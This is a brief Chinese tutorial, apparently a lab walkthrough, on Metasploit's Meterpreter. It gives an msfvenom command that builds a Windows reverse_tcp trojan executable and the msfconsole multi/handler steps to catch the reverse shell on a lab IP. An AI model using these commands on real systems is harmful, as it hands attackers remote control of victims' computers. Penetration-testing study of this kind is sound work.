首先需了解Meterpreter
1.什么是Meterpreter
Meterpreter是一个用于渗透测试和漏洞利用的强大工具,它是Metasploit框架的一部分。Meterpreter是一种高级的Payload,它提供了一个强大的交互式命令行界面,允许攻击者在目标系统上执行各种命令和控制操作。
2.生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机的ip lport=10000 -f exe -o payload.exe
reverse_tcp解释一下:reverse_tcp 这是一个基于TCP的反弹shell
同时还有 everse_http reverse_http
正向连接:在msf中通常是指,bind_tcp,定义--攻击机主动发起连接请求,连接到目标靶机特定的一个端口,目标机器也需要开启一个监听端口,比如tcp监听
反向连接:在msf中通常是指,reverse_tcp,定义--更常用,通过设置reverse_tcp攻击载荷可以轻松实现反弹,监听只需要在本机开启监听端口。
主要区别就是公网和局域网的不同利用,正向连接通常攻击机用在局域网中不能访问外网靶机,反向连接需要两个机器都需要能互相ping
端口为任意没有被占用的端口
3.监听
1.进入
msfconsole
进入msf
2.设置参数
use exploit/multi/handler //进入handler模块
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.88.129//设置本机ip
set lport 4000
run
3.从本地打开生成的木马
成功了